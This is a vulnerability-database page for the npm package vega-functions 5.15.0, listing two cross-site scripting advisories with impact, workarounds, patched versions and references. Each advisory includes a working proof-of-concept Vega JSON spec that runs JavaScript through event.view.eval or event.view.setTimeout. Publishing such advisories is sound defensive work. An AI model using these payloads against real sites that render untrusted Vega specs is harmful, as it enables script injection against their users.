npm - vega-functions - Versions - 5.15.0 - Mend

vega-functions 5.15.0

2 security vulnerabilities found in version 5.15.0

Vega vulnerable to Cross-site Scripting via RegExp.prototype[@@replace]

medium severity CVE-2025-27793

Affected versions: < 5.17.0

Impact

Users running Vega/Vega-lite JSON definitions could run unexpected JavaScript code when drawing graphs, unless the library is used with the vega-interpreter.

Workarounds

Use vega with expression interpreter
Upgrade to a newer Vega version (5.32.0)

POC Summary

Calling replace with a RegExp-like pattern calls RegExp.prototype[@@replace], which can then call an attacker-controlled exec function.

POC Details

Consider the function call replace('foo', {__proto__: /h/.constructor.prototype, global: false}). Since pattern has RegExp.prototype[@@replace], pattern.exec('foo') winds up being called.

The resulting malicious call looks like this:

replace(<string argument>, {__proto__: /h/.constructor.prototype, exec: <function>, global: false})

Since functions cannot be returned from this, an attacker that wishes to escalate to XSS must abuse event.view to gain access to eval.

Reproduction steps

{"$schema":"https://vega.github.io/schema/vega/v5.json","signals":[{"name":"a","on":[{"events":"body:mousemove{99999}","update":"replace('alert(1)',{__proto__:/h/.constructor.prototype,exec:event.view.eval,global:false})"}]}]}

Vega Cross-Site Scripting (XSS) via event filter when not using CSP mode expressionInterpeter

medium severity CVE-2025-26619

Affected versions: < 5.16.0

Impact

In vega 5.30.0 and lower, vega-functions 5.15.0 and lower , it was possible to call JavaScript functions from the Vega expression language that were not meant to be supported.

Patches

Patched in vega 5.31.0 / vega-functions 5.16.0

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

Run vega without vega.expressionInterpreter. This mode is not the default as it is slower.
Using the interpreter described in CSP safe mode (Content Security Policy) prevents arbitrary Javascript from running, so users of this mode are not affected by this vulnerability.

References

Reported to Vega-Lite by @kprevas Nov 8 2024 in https://github.com/vega/vega-lite/issues/9469 & https://github.com/vega/vega/issues/3984

Reproduction of the error in Vega by @mattijn

{
  "$schema": "https://vega.github.io/schema/vega/v5.json",
  "signals": [
    {
      "name": "inject_alert",
      "on": [
        {
          "events": [
            {
              "type": "mousedown",
              "marktype": "rect",
              "filter": ["scale(event.view.setTimeout, 'alert(\"alert\")')"]
            }
          ],
          "update": "datum"
        }
      ]
    }
  ],
  "marks": [
    {
      "type": "rect",
      "encode": {
        "update": {
          "x": {"value": 0},
          "y": {"value": 0},
          "width": {"value": 100},
          "height": {"value": 100}
        }
      }
    }
  ]
}

No license issues detected.

This package version has a license in the source code.

This package version is available.

This package version has not been yanked and is still available for usage.